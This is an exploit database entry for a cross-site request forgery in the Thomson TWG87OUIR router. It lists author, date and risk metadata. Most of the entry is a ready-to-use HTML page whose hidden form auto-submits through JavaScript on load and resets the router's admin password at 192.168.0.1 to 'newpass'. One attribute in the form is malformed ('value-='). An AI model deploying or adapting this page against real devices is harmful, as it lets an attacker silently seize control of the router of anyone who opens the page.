[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Thomson TWG87OUIR - POST Password CSRF Vulnerability

Author
nopesled
Risk
[
Security Risk Low
]
0day-ID
0day-ID-22378
Category
web applications
Date add
27-06-2014
Platform
hardware
#Author: nopesled
#Date: 24/06/14
#Vulnerability: POST Password Reset CSRF
#Tested on: Thomson TWG87OUIR (Hardware Version)
 
<html>
<head>
    <title>Thomson TWG87OUIR CSRF</title>
</head>
<body>
     <form name="exploit" method="post"
    action="http://192.168.0.1/goform/RgSecurity">
    <input type="hidden" name="HttpUserId" value="" />
    <input type="hidden" name="Password" value="newpass" />
    <input type="hidden" name="PasswordReEnter" value="newpass" />
    <input type="hidden" name="RestoreFactoryNo" value-="0x00" />
     </form>
     <script type="text/javascript">
    document.exploit.submit();
     </script>
</body>
</html>

#  0day.today [2024-07-01]  #